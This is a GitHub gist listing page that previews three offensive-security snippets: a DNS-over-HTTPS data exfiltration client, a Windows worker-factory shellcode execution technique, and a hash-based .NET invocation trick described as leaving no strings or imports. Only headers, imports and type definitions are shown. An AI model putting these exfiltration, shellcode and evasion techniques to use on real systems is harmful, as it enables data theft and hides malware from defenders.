Skip to content

Instantly share code, notes, and snippets.

View 0xHossam's full-sized avatar
🫠

Hossam Ehab 0xHossam

🫠
289 followers · 133 following
View GitHub Profile
@0xHossam
0xHossam / client.py
Last active April 27, 2025 08:24
Data Exfiltration Using DNS over HTTPS (DoH) for HTTPS POST Requests & Sending Data in Chunks
# Info: Stealthy Data Exfiltration Using (DoH) - Client Code
# Date: May 26, 2024
# Author: Hossam
import os, glob, requests, logging, struct, base64, random, time, httpx
from datetime import datetime
import urllib3
import win32com.client
from colorama import Fore, Style, init
from cryptography.fernet import Fernet
@RistBS
RistBS / shellcode_exec_workerfactory.c
Last active April 23, 2025 19:32
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@dr4k0nia
dr4k0nia / HInvoke.cs
Last active April 11, 2025 17:01
A very minimalistic approach of calling .net runtime functions or accessing properties using only hashes as identifiers. It does not leave any strings or import references since we dynamically resolve the required member from the mscorlib assembly on runtime. Read the blog post: https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avo…
using System.Linq;
using System.Reflection;
namespace HashInvoke;
public class HInvoke
{
public static T InvokeMethod<T>(uint classID, uint methodID, object[]? args = null)
{
// Get the System assembly and go trough all its types hash their name